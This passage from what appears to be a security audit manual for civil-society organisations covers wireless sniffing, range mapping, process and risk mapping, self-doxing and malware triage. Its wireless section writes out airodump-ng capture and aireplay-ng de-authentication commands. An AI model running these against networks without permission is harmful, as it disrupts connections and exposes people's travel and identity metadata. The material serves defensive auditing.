At the organization, the facilitator explains the activity to the organization members. To balance the need for consent with the benefits of identifying actual daily practices which may need improvement, the staff should already be aware that examining physical devices is part of the audit scope, but not the specific activity. Staff will be able to first identify and address their personal concerns before others.

• Each staff member will get a paper and a pen to note the physical vulnerabilities that they notice (cameras/cellphone cameras can also be used, note the operational security considerations listed).
• For each vulnerability noted, the staff member will get a point. The facilitator should encourage staff to also look for other, not listed, vulnerabilities. For vulnerabilities that staff members suggest which were not listed; if they can explain how that vulnerability would realistically be exploited, the facilitator can award a point.
• If possible, a prize should be provided to the "winner" with the most points.
• Staff must first check their own desks for 5-10 minutes total:
  • Review the physical security of their work space.
  • Take pictures or notes on their findings
  • Fix each vulnerability they found
  • Report back to the facilitator
• In the entire office space, staff members will spend 15 minutes to:
  • Review the physical security of other desks, meeting rooms, shared spaces etc...
  • Take pictures or notes on their findings without touching anything
  • Report back to the facilitator
• Debrief:
  • After the "hunt" time is up, the facilitator should gather the staff back together.
  • The facilitator will gather the notes and review quickly for any high-risk or embarrassing findings. If those exist, the facilitator should privately tell the finder to not bring that up in discussion
  • The facilitator can lead a discussion on interesting findings, but focus on moving towards changes in practice and policy for the organization to consider.
  • If possible, quickly calculate scores and announce the winner
• Reporting:
  • The facilitator should combine the notes and communicate them securely to the Auditor, and securely destroy the notes.

Recommendation

(See "Guided Tour")

Monitor Open Wireless Traffic

Summary

It can be valuable to to listen to broadcast wireless traffic at the physical office location, even before knowing anything about the organization's network itself. This outside, passive information gathering can reveal a surprising amount of data on not only what devices are connecting to which networks, but also what type of devices they are (based on their unique MAC addresses), and what other networks those devices have historically connected to. These probes can reveal personal, organizational, locational, and device information that, taken in context, can be dangerous or lead to other vulnerabilities.

Overview

Each wireless device maintains a "memory" of what networks it has successfully connected to. When it is connecting to a network, it sends out "probes" to all of the networks it has in this memory. It is important to note that this data gets broadcast widely, and can be collected without any network access, only proximity to the device.

These network probes can often contain names (especially from mobile phone tethers), organizational affiliations, device manufacturers, and a mixture of other potentially valuable data (home network names, recent airports/travel locations, cafés and conference networks). If there are many networks in the office's vicinity, this activity can also help identify the specific office network (if there is any doubt). In many cases, an organization may not want the name of their wireless network to be associated with their organization, but it may be revealed by this additional meta-data.

Beacons can "de-anonymize" an obfuscated network name as well as provide rich content for social engineering attacks. This provides an only-lightly-invasive introduction to discuss the trackability of devices, particularly mobiles and laptops.

• Scan for wireless networks nearby, identify (and confirm) the office network(s).
• Monitor traffic of that network and capture potentially sensitive metadata (wireless security settings, beacons, and MAC addresses).
• Research likely device hardware using MAC addresses.
• Do the staff devices leak sensitive metadata?
• What can be determined about the organization based on broadcast wireless data?

Materials Needed

• Wifi card (and drivers) that can be set to monitor mode.

Considerations

• Despite this exercise covering only broadcast data, check the local laws which might cover this process before conducting it.
• Consider how it looks to third parties as you are scanning a network, especially from outside an office.
• Confirm that all devices you are accessing/scanning belong to the organization.
• Delete all devices from your scan that do not belong to the organization.
• Study outputs for any obviously embarrassing personal information (especially network beacon records) before sharing.

Walkthrough

Step 1: Monitor Mode

You should disconnect from any wifi network you may be connected to to capture the widest amount of data.

Switch your wireless adapter to monitor mode**

$ airmon-ng start <interface>

You may need to stop your network manager system to prevent it from interfering. Running

$ airmon-ng check

to list anything that is causing problems, and

$ airmon-ng check kill

to try and stop them automatically, and running stop network-manager && stop avahi-daemon may keep them from re-starting automatically.

Step 2: Listen for wifi probes.

Run airodump-ng on the monitor mode interface (usually mon0). This listens to wifi beacons and you can begin analyzing who is on what network, and see historical networks.

airodump-ng -w filename mon0

This scans all networks and channels, collecting broadcast network information. Note that, despite its broadcast nature, this is privacy invasive and can be considered illegal: http://www.slate.com/blogs/future_tense/2013/09/16/google_street_view_wi_fi_snooping_case_good_news_and_bad_news.html . You can restict this to a specific channel or base station ID (BSSID) with -c and --bssid:

airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w filename mon0

Step 3: de-auth (optional)

Send de-authentication packets to force clients to reconnect and send out additional probes. Take note that by its very nature, de-authentication causes annoying interruptions to wifi traffic. This breaks connections, drops skype calls, and can make the wireless network temporarily unusable -- Make sure to check with staff before going through this (to make sure no one is doing a live webcast or on an important VOIP call, and to expect some network instability).

$ aireplay-ng -0 1 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0

 15:54:48  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
 15:54:49  Sending 64 directed DeAuth. STMAC: [AA:BB:CC:DD:EE:FF] [ 5| 3 ACKs]

This command de-authenticates one targeted user with one attempted deauth packet. "-0 10" would try 10 times (potentially disconnecting the user multiple times!). With permission, you can also target all users on a network by leaving out the "-c ..." flag.

There are scripts, like wifijammer, which use this same approach to jam all wifi connections in range of the attacking computer, so check against the documentation at http://www.aircrack-ng.org and act responsibly to protect yourself and the organization.

Step 4: MAC Address Research

The first three hex numbers of each MAC address designate the vendor, which can reveal useful information in matching MAC addresses to devices. The MAC address is a unique identifier, so never post or search using the full address. Note that increasingly, devices are using MAC address randomization, but if it implemented, it often is poorly implemented against even minimally determined adversaries, as per this 2017 research study.

To compare found MAC addresses to the bendor database offline you can download the full vendor database from IEEE or use the Wireshark list

Step 4: Ongoing Monitoring

The longer you leave this running (particularly when staff are first entering the office or returning after lunch/meetings), the better sense of what devices are connected to the network you will get.

Watch what probes the various devices are sending out (especially when they are deauthenticated, as above). You will see each computer on the network, as identified by their mac addresses, broadcast information about previous networks to which they have connected.

BSSID              STATION            PWR   Rate    Lost    Frames Probe

00:11:22:33:44:55   0F:3E:DF:DA:2D:E2   -67 0   0   234567  SampleOrg,linksys¸John Smith's iPhone,Free Public Wifi
00:11:22:33:44:55   F8:7E:FC:03:CC:43   -80 -24 0   234567  amygreen,SampleOrg,android-hotspot,Starbucks,united_club,Dulles Airport WiFi
00:11:22:33:44:55   F8:19:F3:DF:75:19   -58 -54 0   234567  SampleOrg
00:11:22:33:44:55   38:08:95:EB:7E:0B   -75 -12 0   234567  HolidayInn,SampleOrg,John Smith's Mac mini,android-hotspot

Recommendation

Recommendation: Cleanse wifi network connection history

For most devices, deleting networks from the “saved” network list will stop them from being probed. Obviously, this can be an annoyance for networks you regularly connect to, so renaming these networks to non-revealing names would help, as would creating non-name-associated “guest” networks for colleagues connecting to your home network.

On iPhones and iPads, it is not possible to selectively remove historical networks unless you are currently in range of that network. It is however possible to remove all history: go to Settings > General > Reset > Reset Network Settings . When you take this step, it is worth going through this reset multiple times – approximately once per year of device ownership, as the first reset appears to only remove recently-connected networks, and older networks will be broadcast.

Recommendation: Use innocuous network names

Organizations may want to choose innocent or generic network names, and/or not broadcast network names. It is worth noting that devices seeking out hidden networks will "beacon" for the actual network name, so this has extremely limited security use and must be combined with other protective measures. See this Acrylic blog post for further details.

It is worth noting that wifi access points are also tracked to assist in location services, and as such the location of a wireless network can be learned from its name or the MAC address of the access point. WiGLE is a community-managed database for such information, but both Google and Microsoft, and likely many others, also track this locational information, so the opt-out information below is only minimally useful.

Removal options: See wikipedia for public listings. Some opt-out options exist below:

• WiGLE: WiGLE's FAQ: "To have your record removed from our database, or if you have any questions or suggestions, send an email to: WiGLE-admin [at] WiGLE.net […] include the BSSID (Mac Address) of the network in question!"
• Google Location services : https://support.google.com/maps/answer/1725632?hl=en
• Mozilla Location Services: follows the Google standard of adding _nomap to a wifi name.
• Microsoft Location Services: https://support.microsoft.com/en-us/help/20039/opt-out-of-location-services ; See also using _optout and blocking wifi login information in Windows 10
• Apple: No clear opt out, more information: https://www.apple.com/newsroom/2011/04/27Apple-Q-A-on-Location-Data/
• Skyhook: http://www.skyhookwireless.com/opt-out-of-skyhook-products

Wireless Range Mapping

Summary

This component allows the auditor to show the "visibility" of an organization's wireless network to determine how far the organization's wireless network extends beyond a controlled area. Wireless networks are often trusted as equivalent to the hardwired office networks they have largely replaced, but they have important differences. Wireless networks are often "visible" from outside the walls of the office - from common spaces or even the street. Without further access, this reveals a wealth of information about the organization's size and the type of devices connecting to their network.

Overview

This component consists of wireless scanning and wireless signal mapping. It is useful for organizations with offices in shared spaces/buildings/apartment complexes or near locations where an adversary could easily "listen" to network traffic. In conjuction with Monitoring Open Wireless Traffic exercise, it can also identify devices using that network. It is useful to do this in parallel with Office Mapping to build a more comprehensive view of the information assets of the organization.

• Identify and verify the network(s) belonging to the organization
• Create a map or photos indicating the range of each relevant wireless access point.

Materials Needed

• A portable wireless device (like an Android phone/tablet) is useful to map the network boundaries without causing undue suspicion. Some Apps like Wifi analyzer and Wifi Mapper can help.

Considerations

• Despite this exercise covering only broadcast data, check the local laws which might cover this process before conducting it.
• Consider how it looks to third parties as you are scanning a network, especially from outside an office.

Walkthrough

Map the range of the organizations wireless network outside of office space, using wifite or other tools to track network strength.

A variety of apps and tools can support this work without resorting to professional "wifi site survey" tools. If the Office Mapping exercise has taken place, that map can serve as the starting point to expand the map outside the office. If using a third party tool or app, ensure that the app is not sharing sensitive data. Using simple signal strength monitors in combination with location notes is more than sufficient. In Linux systems, one can use wavemon, kismet, wifite, and even the networkmanager command line tools to track visible networks and their strengths as described on StackExchange:

watch  "nmcli -f "CHAN,BARS,SIGNAL,SSID" d wifi list ifname wlx10feed21ae1d  | sort -n"

• https://www.netspotapp.com/ (OSX, Windows, free for non-commercial uses)
• http://wifianalyzer.mobi, http://wifiheat.com/ (Android)

Recommendation

Depending on office layout, moving the wireless access point may help to reduce how far the network is transmitted outside of the office space, and changing devices which do not move to better enable this without loss of functionality.

See also Monitoring Open Wireless Traffic recommendations and Network Access security recommendations.

A Day in the Life

Covered in full in User Device Assessment:

• Integrated with other activities/interactions, interview staff on their usage of technology and remote services

A Night in the Life

Covered in full in User Device Assessment:

• Integrated with other activities/interactions, interview staff on their usage of technology and remote services outside of work

Process Mapping

Summary

This activity helps to identify the processes that allow the organization to function (publishing articles, payments, communicating with sources, field work etc) the assets and systems (websites, software, PayPal accounts) they rely on, and which ones are critical to their work.

Participating organization/s are asked to "brain-storm" a list of all the processes that are critical for their work and the auditor works to map the details of critical processes out to expose points of risk.

If done correctly, process mapping can help the auditor - Identify risk exposure - Communication issues and effective incident response - Identify what are affected (people, systems, technologies) - Identify areas of improvement in securing organization's process - Generate a mitigation/solution plan for missing security controls - Show the importance of digital security to staff, management team and stakeholders

Overview

• Brainstorm with staff on the organizational processes -- Try to make sure that everyone is present as the processes mapping involves them who use the process. Depending on the size and structure of the organiation, it may be valuable to have a separate meeting per team or with the staff separate from the management.
• Identify a smaller sets of processes which are mission critical. Preparatory research into the organization and its activities will help you guide towards particularly critical processes such as:
• Communicating with sources
• Sending sensitive information to colleauges and 3rd party organizations
• Managing online accounts/presence (website security, social media accounts)
• Access to organizational resources (e.g., Organizational funds, banking etc)
• Finish the process mapping first - take note and park the discussions of improvements after
• It is common for participants to resolve issues, discuss exceptions and errors during the activity
• Map the basic process first, then go back the exceptions and errors. You can't prioritize until you have the whole picture
• Completely mapping interactions and events that compose a process will lead you to the areas that are expose to risks
• Put everything in a drawing board
• Modifying & changing a flow in a process is easy and more chance to change. It can also make the participants interactive.
• Slides looks formal and official, and somehow difficult to change and modify

Remember that in any process mapping session, participants may bring up exceptions and errors. Adding digital only makes things more complicated and messy. In order to manage your time effeciently and not end up discussing issues and solving them during session, you must:

1. Be firm with your goal.
   • Map out the current overall process first
   • Manage and control your audience by limitating discussion over insignificant topics
   • List all issues and errors and review them later
2. Balance active facilitation with taking time to look for weaknesses
   • A background in digital security helps you as an auditor to identify possible ways how you one can exploit a weak processes. While largely letting the organization drive the process creation, ask targeted questions to fully expose the full extent of a critical process and keep an eye on ways the processes could be vulnerable. If this is your way of thinking, you may already be formulating ideas on how to mitigate those attacks and give the best recommendation according to their process.

If it was not possible to conduct these activities in person, you can conduct them remotely through applying one of the remote facilitation approaches described in the Remote Facilitation appendix.

Materials Needed

• Stickies
• Markers
• Whiteboard or flip-chart

Considerations

This activity contains significant information about the internal process of an organization, and requires proper documentation and secure handling. If this information is leaked, it will expose the organization's process weaknesses. If destroyed without backup, will require you to redo all the steps and activities you have done in the past wasting precious time.

• Treat device assessment data as well as any additional service information learned with the utmost security
• Ensure that any physical notes/drawings are erased and destroyed (throughoughly shredded/burnt papers, and whiteboards/blackbroads erased with alcohol/water) once backed up digitally.
• Ensure that any digital recordings of this process are kept secure, encrypted, and backed up
• Consider who has physical and visual access to the room where this process takes place, and if the room can be secured if this activity may span long/overnight breaks.
• For high-risk organizations, or even among others, it is of best practice to keep digital devices such as mobile phones, laptops and computers turned off during the mapping activity. The use of camera, (not camera phones) is recommended. Mobile devices such as laptops and mobile phones if compromised can record audio, and capture videos.

Walkthrough

• List all organizational processes: The goal of this exercise is for the auditor to lead the host participants in "brain-storming" a list of all the processes the organization takes part in to carry out their work. It is important to remember this is a brainstorming session of all of the processes that occur in the organization. To get started, the auditor may find it useful to give the participants a few examples such as:

  • Research gathering and source management
  • Editing / Publishing
  • Outreach and advocacy
  • Paying Staff
  • Managing grants or other funding
• Determine critical processes: During this exercise the aim is for the auditor to lead the attendees in narrowing down the subset of activities to those that are crucial to their work. Once the participants have brainstormed these out the facilitator leads the participants in identifying critical processes (this may be all of the processes identified).
  • Quickly identify the main purpose of the organization.
  • Once a complete list has been created, the auditor will then go through through to identify with the participants the critical processes within the organization – that is, without these processes the organization would not be able to function or function at a very poor level, or would not fulfill its mission

NOTE: If an auditor does not ensure that the uniquely identified subset of processes speaks to the full range of participants, their recommendations are more likely to be met with resistance.

• Map out critical processes: In this exercises the auditor does free-hand drawing (ideally on a whiteboard to allow for easy changes) mapping for each process guided by the host participants. The auditor needs to make sure that they work to develop a broad understanding of the overall process. This is a time consuming activity, and managing their overall time to complete the entire needs assessment, and respect the time constraints of the staff, is critical.
  • Clearly identify the process name on the whiteboard or flipchart
  • Have your participants explain to you what the process is step-by-step, while making a note on the side where there will be follow on processes.
  • Keep it simple to facilitate broad understanding of the OVERALL process. Too much detail early on can be overwhelming and/or lead to confusion. If you agree that more detail is required on a particular action, it is easy to highlight that box and produce a separate chart showing the process taking place within.
  • Take quick notes to remind yourself of any key points not clearly marked on the map before they move on to the next activity.
  • Keep track of participant engagement and reactions in case there are edge cases you may need to follow up on individually afterwards.
  • After completing all the key events take a photo of the whiteboard / store the chart-paper for later documentation.

While doing this it is important to consider level of detail you will be mapping out (this should be pre-determined or established so everyone is on the same page). You will generally want to capture:

• The people involved;
• The tasks, conversations, and decisions they carry out;
• The flow of materials, information and documents between them;
• How the actions take place (email, calls, travel)
• The relationship and dependance between the steps.

• Actual processes, not idealized ones

• Identify points of failure: Begin to ask questions of how or why a particular process or step could be problematic or risky. Depending on the organization, you may want to do this as only mental notes to yourself or as a more interactive discussion. The goal is to improve the organization's understanding of their own processes and the risks they include.

Recommendation

Process mapping is simply documenting the steps in a certain process or simply an inventory of why you do the things that you do. It is your job as an auditor to map the organization's existing process in order to achieve sound judgement in providing digital security recommendation or solution.

This activity can sometimes lead to hopelessness, or challenge; it is important to remind the staff that any risk can be mitigated, and indeed it is the goal of an audit to identify the highest priority ones based on actual likelihood and provide guidance on mitigation.

Risk Modeling Using the Pre-Mortum Strategy

Summary

The pre-mortum strategy was devised to take participants out of a perspective of defending their plans and strategies and shielding themselves from flaws. They are given "a perspective where they [are] actively searching for flaws in their own plan." ⁷⁸.

Overview

• "Pre-Mortum" Activity
• Identification of critical processes
• Selected critical process mapping
• Threat Identification (Control/Confidentialy/Idenity/Integrity/Authentication/Access)
• Impact Identification
• Adversary Exploration (Likelyhood)
• Impact Ranking

Materials Needed

• Stickies (in multiple colors)
• Whiteboard or flip-chart
• Markers
• Camera to digitally capture the data

Considerations

• Treat risk modeling data with the utmost security
• Ensure that any physical notes/drawings are erased and destroyed once digitally recorded.
• Ensure that any digital recordings of this process are kept secure and encrypted.

Walkthrough

Prepare a flipchart / space on the white-board to keep track of process', threats, impacts, and adversaries that are identified during other activities. Participants can easily get ahead of the process as they explore individual ideas. Keeping a space for these "upcoming" activities will help re-center them on the activity at hand.

Pre-Mortum Strategy: (30 Minutes) The pre-mortum strategy was devised to take participants out of a perspective of defending their plans and strategies and shielding themselves from flaws. They are given "a perspective where they [are] actively searching for flaws in their own plan." ⁷⁹

• Explain the pre-mortum activity. The participants are to imagine that it is months into the future and they have continued doing their work as normal. And something happened that left them entirely unable to function or functioning at a very poor level. "That is all they know; they have to explain what has happened." ⁸⁰
• Create a broad list of possible explanations for what has happened.
• Identify the most likely explanations.
• List the process' that would have to fail for those causes to take effect.
• Identify two to three process' that are central to the failures and write them on a list of critical process'.

Process/Interaction Mapping (30 minutes per process):

• Pick a process from the list of critical processes identified above.
• Clearly identify the process name on the whiteboard or flipchart.
• Create a list of individuals who take part in the process.
• Draw a symbol of the person.
• Write a label describing their role or title.
• Draw lines with arrows connecting individuals who interact with each other in this process.
• Label the lines with words describing the interaction.
• Write numbers on the interactions to show the order they occur in.
• Continue this activity with the next critical process.

NOTES: * You can add follow-on processes to examine if they are identified as critical by the participants during this activity. Specifically, the exercises in the Threat Assessment section pair well. * Put people on post-its to make them able to be moved around. * Verbally walk the participants through the completed process so you ensure you didn't miss anything. * Take quick notes to remind yourself of any key points not clearly marked on the map before they move on to the next activity. * After completing all the key events take a photo of the whiteboard / store the chart-paper for later documentation.

Recommendation

Risk Matrix

Covered in full in Threat Identification:

• Create a risk matrix placing impacts against a range of likelihood.
• Clean up critical process maps for use in reporting.
• Create a list of all services or assets that were identified during the activity that were not already known by the auditor.

Critical Data Activity

Covered in full in Data Assessment:

• With staff input, post up popular places where data is kept (laptops, email, shared drives...)
• Using stickies, gather from the staff what data is kept in what locations - duplicating notes when needed
• Rank data by sensitivity
• Discuss the impact of one of the devices where data is stored being lost - are there backups?
• Discuss the impact of a device being exposed / taken by an adversary
• Identify who has access (physical access, login access, and permissions), and who needs to have access to get the organizations work completed.

Self Doxing

Summary

Doxing (also "doxxing", or "d0xing", a word derived from "documents", or "docs") consists in tracing and gathering information about someone using sources that are freely available on the internet (called OSINT, or Open Source INTelligence).

Doxing is premised on the idea that "The more you know about your target, the easier it will be to find their flaws”. A malicious actor may use this method to identify valuable information about their target. Once they have found sensitive information, they may publish this information for defamation, blackmail the target person, or use it for other goals.

This activity aims to help participants identify any unwanted personal information that may be publicly available online, and to make them aware of the risk of doxing and how to prevent it.

Overview

Self-doxing:

This activity is aimed at showing the group how to research the data traces they leave online, as well as to improve the results of the Manual Reconnaissance activity with research carried out by individuals on themselves, which helps protect their privacy and makes results more detailed. With this approach, the auditor will only be informed about the results if mitigation steps such as takedowns are indicated.

• Explain to the group that harassers and stalkers use several tools and techniques to gather information about their targets.
• Explain that during this activity participants will use the same tools and techniques on themselves, practicing "self-doxing".
• Identify relevant search engines and other websites for self-doxing in the organization's particular context.
• Participants practice self-doxing in couples.
• (Alternatively, this activity may be assigned as homework, rather than practiced as a group exercise, to protect participants' privacy.)
• If significant results are found that might endanger an individual or the entire organization, instruct them on how to perform a takedown request to the relevant website and/or search engine.

Materials Needed

• Computer with Internet connection
• Projector
• Printouts of this self-doxing guide
• A big sheet of paper or a whiteboard

Considerations

• Recommend the usage of the Tor Browser for this activity.
• Treat threat and adversary data with the utmost security.
• Ensure that any physical notes/drawings are erased and destroyed once digitally recorded.
• Ensure that any digital recordings of this process are kept secure and encrypted.
• Before targeting any individuals, do the research for the organization itself.
• If using a staff member for the example, have a private session with them beforehand to make sure you do not expose any sensitive information to the group.
• Ensure that you have consent from the staff members you will use as an example for this activity.

Walkthrough

• Prepare before the activity by doing this research on a few members of the organization to identify good examples

• Present the problem to the group:

  Harassers and stalkers use several tools and techniques to gather information about their targets, but since these tools and techniques are mostly public and easy to use, we can also use them ourselves, on ourselves, as a preventative measure. "Self-doxing" can help us make informed decisions about what we share online, and how. (Of course, these same instruments can also be used to learn more than is immediately obvious about someone we have met online before we give them our full trust - for example to decide if we want to admit them to a private mailing list or group on social networking platforms.) Methods used for doxing (and self-doxing!) include exploring archives, yellow pages, phone directories and other publicly available information; querying common search engines like Google or DuckDuckGo; looking for a person's profile in specific services; searching for information in public forums and mailing lists; or looking for images that the person has shared (and for instance may have also published in another, more personal, account). But it can also simply consist in looking up the public information on the owner of a website, through a simple "whois search".

• Ask the group to brainstorm possible search engines and websites where information could be found on them and their communities - encourage them to think of local services or services used by their friends, including social networking platforms.
• Give out copies of this self-doxing guide
• While projecting to the group, conduct a research on yourself or a high-profile member of the organization who has given their consent. Perform the search on websites mentioned in the self-doxing guide and during the brainstorming activity.

• Either have them do the same research on themselves in pairs or assign this research as homework.

  Note: If participants perform the research at home, it is important to warn the group that when practicing self-doxing, there is a risk of getting exposed to results that they may find disturbing. Tell them that if they think they may need support, they should ask a close friend to be around while they carry out their research.

  • Instruct participants to use the Tor Browser and a browser different than their usual one to perform the research, and ask them to search both on the websites and services listed in the self-doxing guide and in the ones mentioned during the brainstorming.

  • Explain that, to decide what to search for, one should try to understand what activities expose them to a higher risk of being attacked by trolls or other malicious actors. They should ask themselves: "Why would someone want to spend hours of their time to track information on you in the internet?" Add that this kind of attack often affects minorities or people who support controversial opinions online, and the attack starts from the information that the malicious actor will find immediately available - like the nickname and profile used by the target in the platform where the attack has started, or the pictures the target has published in their page. This is where they should start from.

  • Instruct the group to check the properties of the posts and media they have published, to make sure that they aren't leaking their IP address or other metadata.

  • Show the group a reverse image search on TinEyE or Google and recommend they do it on pictures of themselves they have published online.

  • Show the group how to check if their online account has been previously compromised on Have I Been Pwned?. Explain that often results are old and if they have changed their password recently, showing up on this search may not be a problem. Tell them that if they are still using that old password for the compromised account of for other accounts, they should immediately change that password.

Recommendation

Suspicious Activity Analysis

Summary

Malware is a common tactic to target organizations. Malware like a Remote Access Trojan (or RAT) can provide an attacker with backdoor access to a targeted machine, enabling the attacker to steal information, record audio and video, as well as run commands on the infected machine.

To stop this from happening, you have to identify the malicious process within the system and stop it, or reformatting the machine in case you don’t feel spending time on stopping the malicious process.

It’s important to keep evidence, in case the auditee still has access to the original malicious software they received (e.g., an email, etc.), keep a copy of the file if you have the time and expertise to continue investigating or have the resources to submit it to other organizations working on analyzing such issues.

Scanning the possible infected machine or the original suspicious file with an anti-virus will save you time and effort, in the case such malware is already in its database. Scanning should always be the first step, preventing you from spending excess time if the machine was infected with a less serious piece of malware.

After determining the machine is infected, you can proceed in helping the staff member back up their information, scanning the files for malware, then reformatting the infected machine. Note, it is very difficult to clean an infected machine if you only have a short window of time.

In case the machine was infected, taking an image of the operating system will allow you to replicate the infected machine and run it after you finish your audit for a more in-depth investigation or send it to an expert to work on investigating the malware. Note, this also can be difficult in an audit setting where time is limited. Also see operational security considerations that come with replicating the files of a staff member of a sensitive organization. Be sure this is absolutely necessary and the staff members provides consent before completing.

Overview

In the following, you should look for files and URLs that may indicate a compromise and may help you identify an infection. If you have time, some inital light research may be suggested to see if the URLs or files hashes have been identified by other security researchers which can help you provide more context to the organization around the types of threats they are facing.

Materials Needed

• An Incident Response Plan agreed upon with the organization
• An emergency contact for the organization
• A Kali Virtual machine connected to the Internet
• A Cuckoo Sandbox installation (for later analysis post audit if you have the expertise)
• VPN
• USB drive(s)
• Large capacity External Hard disk, OS installation media and license keys

Considerations

• Consider the time you have, investigating malware can take days (you should not investigate during the audit itself)
• Confirm that the device belongs to the organization
• Make sure to take the device offline before start working on it
• Don’t transfer files from the infected machine to any other machines
• Use a USB drive to move files from the infected machine to your Audit machine for investigating proposes
• Study outputs for any obviously embarrassing personal information
• Don’t test anything on your virtual machine without VPN

Walkthrough

• In case they still have the original binaries (Attachment, email..etc.)

  1. Download the file to your auditing machine, Scan the file via Anti-Virus or hash the file and use virustotal.com to search for it (Note, don’t upload the actual file to virus total as uploaded files are discoverable by paid subscribers in most cases)

  2. Check the email’s header and see if it looks suspicious

• In case there is no binaries (Attachment, email..etc.) or they have no access to it

  1. Take the machine offline

  2. In case you have time, Image the hard disk

  3. Help the auditees to operate another machine to fill the gap of the suspicious machine

  4. Run a non-depth scan for the machine and try to locate any suspicious files

  5. Collect the suspicious files, hash them, then search for them on virustotal.com

  6. Scan the open ports and monitor which applications is connected to external address

The next sections often are highly interrelated - a phishing email may include malicious URLs and/or files, network traffic may include URLs, URLs may try to send malicious file downloads.

Questions to ask the user / organization

• What suspicious behaviors are you witnessing?
• Where and when are you seeing this behavior? What makes you feel that the machine is somehow infected?
• Do you have an alternative to this machine/process/account you can use it until we clear things up?
• Did you receive any suspicious or unexpected email, attachment or different form of communication that made you feel this way?
• Do you still have access to the original email, attachment or any form of communication?

Phishing or Suspicious Emails

If the organization staff has received suspicious communications, the first step should be to clearly warn the auditee that any associated files or links should not be opened.

• Ask the client to share the complete email with you. Instructions on how to share the complete email, which includes full headers and attachments:

  Instructions: https://www.circl.lu/pub/tr-34/ (this is preferred over just asking for the headers - as described here: https://www.circl.lu/pub/tr-07/ - since it is just as complicated from the user prospective but provides more information to us or a malware researcher).

• Investigate the intent of the message. If this email appears to be spam, you can rule out an advanced threat and include in your recommendations instructions on how to report spam or mark email messages as junk.

• If the message does not seem to be spam and has links or files attached to the email, capture any suspicious URL and save the file in an empty storage device for further analysis.

• If the email does not have links or files and is not spam, investigate it as a potential social engineering email.

Malicious Files

In this part, you will be investigating a file and determine if it’s malicious or not. The auditor will not have much time for this step, but a preliminary analysis (not longer than one hour) can be performed, following these instructions:

• Step 1: Collection

• Collect the binary from the targeted person or organization by asking them to forward you the suspicious email including any attachment in it, or by coping the file if it’s still on the machine by copying it to a USB drive. In case the user did not remember where the file is located, ask the user to walk through their browsing history or download folder and try to locate the file and then copy it to your USB drive.

• Get a hash of the file and a timestamp of the file at acquisition

Include the hashes of the malicious files in the appendix of your assessment report.

• Step 2: Research

• Initial offline investigation, in this stage you will be scanning the file using ClamAV which comes with Kali-Linux
• Update CalmAV by running the following command in the terminal sudo freshclam
• Create a new folder and copy-paste the suspicious (file)s inside, then scan the targeted folder by running the following command in the terminal which is going to show the infected files and give you more information about it clamscan -r –bell -i /your/target/folder
• Search for the hash on a MISP instance or VirusTotal to check if there are any related events, known malware associations, and connected details (such as URLs, email addresses, IP addresses)

• After scanning the file, in case it has already been identified as malicious, the result will show you what type of malware is, in case the result showed the file as Trojan, Backdoor, agent or Remote access Trojan RAT then it’s time to consider taking an image from the hard drive, the original file, the header of the email and submit them for in depth investigation.

If the organization was targeted with a more advanced attack, there will be a high probability that the attacker will use new or disguised malware -- which means no Anti-Virus will find it as malicious, in this case, and if you feel you still have doubts that a clean file is still malicious, submit it for in depth analysis.

• Step 3 (Optional): Imaging

In this step, you will be dealing with infected machine by one of the binaries you analyzed in step 1 and 2, or you are sure that the machine is infected and you have no time to analyze it. In this case, you will take a backup, migrate the data safely to a new machine and take a full image from the system and submit it for more in depth analysis.

• It’s better to start with taking a full hard disk image, using ‘dd’ a tool that takes bit-by-bit copy of the hard drive, after taking the image, you will have an identical copy of infected machine and you can send the hard drive to experts for more in depth analysis. To take the image, you will need to boot the infected machine with a Live Kali Linux and apply the following steps:

  • Identify the <source> which is the infected hard disk, and <destination> the external hard disk you will put the image on, run the following command which will list all the drive lsblk

  • After identifying the source and destination, apply the following command the start the process dd if=<source> of=<destination> bs=<byte size> Where bs is byte size, read more about how to use dd here

• Taking back up in this stage is to back-up all the important data and save them on a hard drive, usually it’s the document, desktop, download, favorite and personal data, save them on external storage then Scan them using ClamAV or any available Anti-virus on your auditing virtual machine.

• Make sure the data is clean then transfer it to the clean replacement machine.

• Step 4 (Optional): Analysis

See the Incident Response activity for additional details.

You will need at least one hour to prepare and carry the advanced investigation. this step is optional in case you have time and you think you still have doubts about the file and you need a more advanced result. In this step, you will analyze the suspicious file using Cuckoo Sandbox, an automated malware analysis system. In case you decided to go with this option, you will need an installed Linux on your audit machine you can use this Kali guide to install Kali Linux.

• Make sure you have that you have Cuckoo Sandbox installed on your audit Linux machine by running the following command cuckoo

• In case Cuckoo was not installed, follow the following instructions on how to install it. Make sure cuckoo is running without errors the previously posted documentation will provide you with details steps on how to install and run Cuckoo

• Create a new folder and copy-paste the suspicious (file)s inside

• You can use ‘submit’ to start analyzing the binary, you can find more options in the Cuckoo Sandbox documentation , the easiest way to do it is by running the following command: cuckoo submit /folder/targeted/binary

• To view the analysis results, once an analysis is completed, you will find the result in $CWD/storage/analyses/

• You can find more information on how to read the results in the Cuckoo Sandbox documentation

Suspicious URLs

You may have found suspicious URLs in your wireshark output during the traffic analysis, in the email content, in IMs, etc.

Capture the context in which the URL was sent to the user or used by a process (sender, timestamp including timezone, and any other identifying details).

If the URL was sent to the user through a message, ask them if they clicked the link.

• Search for the URL in a MISP instance or with VirusTotal or URLScan.io. Warning - if the file is targeted malware, using online scanners such as VirusTotal or URLScan will show the attacker that you're carrying out an investigation on the incident; try to use their passive search features before using an active scan.
• Open the URL in a private cuckoo sandbox instance for a forensic capture of anything malicious.
• Submit the URL to archive.org or archive.is for public archiving (this could also disclose your investigation to the attacker).

Suspicious Processes

If you find suspicious open ports, follow the instructions in the Network Scanning activity section "How to decide if an open port is suspicious".

It can also be useful to follow these steps:

• On every operating system, check if the device OS and the installed software are up-to-date and where possible set to automatically update.

Windows, Mac, Android

• On Windows, use Process Explorer to dig into further details on each process.
• Check that antivirus is installed in the device and is updated.
• If an antivirus is installed, and it is up-to-date, launch a scan - this will help as a diagnostic tool, to identify any already known malware, not necessarily to remove it. - if malware is identified: - for commercial, known malware - get rid of it through the antivirus
• If the the antivirus is disabled or not updated: - Try to understand if the user disabled it, and why. - if the user hasn't disabled it, a computer compromise is likely.

Android, iOS

• Check if the device is rooted or jailbroken - this might be an indicator of compromise.
• Check if any suspicious applications have been installed from outside the official app stores, and on android, if this has been enabled.

See the User Device Assessment and Mobile Device Assessment activities for more in-depth device analysis.

Unusual Network Traffic

